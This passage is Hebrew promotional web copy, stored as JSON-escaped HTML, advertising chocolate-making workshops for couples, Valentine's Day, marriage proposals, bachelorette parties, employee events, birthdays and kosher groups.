\\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea.<\\/p><p>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4.<br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 